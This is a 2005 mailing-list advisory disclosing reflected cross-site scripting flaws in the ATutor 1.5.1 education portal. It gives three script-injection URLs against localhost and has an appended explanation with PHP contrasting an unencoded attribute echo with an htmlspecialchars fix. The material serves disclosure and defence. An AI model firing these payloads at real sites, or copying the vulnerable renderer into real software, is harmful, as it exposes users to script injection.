Message-ID: <68cbfab10508180407416a9e10@mail.gmail.com>
Date: Thu Aug 18 12:07:38 2005
From: h4cky0u.org at gmail.com (h4cky0u)
Subject: ATutor 1.5.1 and prior multiple XSS Vulnerabilities
ATutor 1.5.1 and prior multiple XSS Vulnerabilities
SEVERITY:
=========
Medium
SOFTWARE:
=========
ATutor 1.5.1
http://www.atutor.ca/
INFO:
=====
ATutor 1.5.1 is a web based education portal.
DESCRIPTION:
============
The system is vulnerable to various XSS attacks:
--==XSS==--
Some examples -
http://localhost/tour/login.php?course="><script>alert('Matrix_Killer r0X');</script>
http://localhost/tour/search.php?search=1&search=1&words="><script>alert('There is no other place like 127.0.0.1');</script>&include=all&find_in=all&display_as=pages
http://localhost/tour/search.php?search=1&words="><script>alert('Found By matrix_killer');</script>&include=all&find_in=all&display_as=pages&submit=Search
VENDOR STATUS:
==============
Vendor was contacted, but no response has been received to date.
CREDITS:
========
This vulnerability was discovered and researched by
matrix_killer of h4cky0u Security Forums.
mail : matrix_k at abv.bg
web : http://www.h4cky0u.org
Co-Researcher:
h4cky0u of h4cky0u Security Forums.
mail : h4cky0u at gmail.com
web : http://www.h4cky0u.org
Greets to all omega-team members + krassswr, EcLiPsE and all who support us!!!
ORIGINAL:
=========
http://h4cky0u.org/viewtopic.php?t=2094
--
http://www.h4cky0u.org
(In)Security at its best...
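
The example URLs in the advisory put `">` ahead of the script tag, which suggests the `course` and `words` parameters are echoed into a quoted HTML attribute without output encoding. The PHP below is an added example, not ATutor's source and not part of the original post; it shows that pattern next to an encoded version. The function names and the input-field markup are assumptions, and the check uses PHP's DOM extension.

```php
<?php
declare(strict_types=1);

// Hypothetical stand-in for a search form that echoes the "words" parameter
// back into an input's value attribute. This is not ATutor's actual code.
function render_search_vulnerable(string $words): string
{
    // Raw interpolation: a double quote in $words closes the attribute,
    // after which "<" and ">" are parsed as markup.
    return '<input type="text" name="words" value="' . $words . '">';
}

function render_search_hardened(string $words): string
{
    // ENT_QUOTES encodes both " and ', so the value cannot leave the
    // attribute; ENT_SUBSTITUTE replaces invalid UTF-8 sequences instead
    // of making htmlspecialchars() return an empty string.
    $safe = htmlspecialchars($words, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<input type="text" name="words" value="' . $safe . '">';
}

// Parse the rendered fragment the way a browser would and report whether
// a <script> element ended up in the document tree.
function contains_script_element(string $html): bool
{
    libxml_use_internal_errors(true); // fragments trigger parser warnings
    $doc = new DOMDocument();
    $doc->loadHTML($html);
    libxml_clear_errors();
    return $doc->getElementsByTagName('script')->length > 0;
}

// Value of the "words" parameter as it appears in the advisory's
// search.php URL.
$words = "\"><script>alert('Found By matrix_killer');</script>";

$renderers = [
    'vulnerable' => 'render_search_vulnerable',
    'hardened'   => 'render_search_hardened',
];

foreach ($renderers as $label => $render) {
    $html = $render($words);
    $found = contains_script_element($html) ? 'yes' : 'no';
    printf("%-10s script element parsed: %s\n  %s\n", $label, $found, $html);
}
```

The same encoding has to be applied at every point where a request parameter is written into HTML, including the `course` parameter of `login.php`.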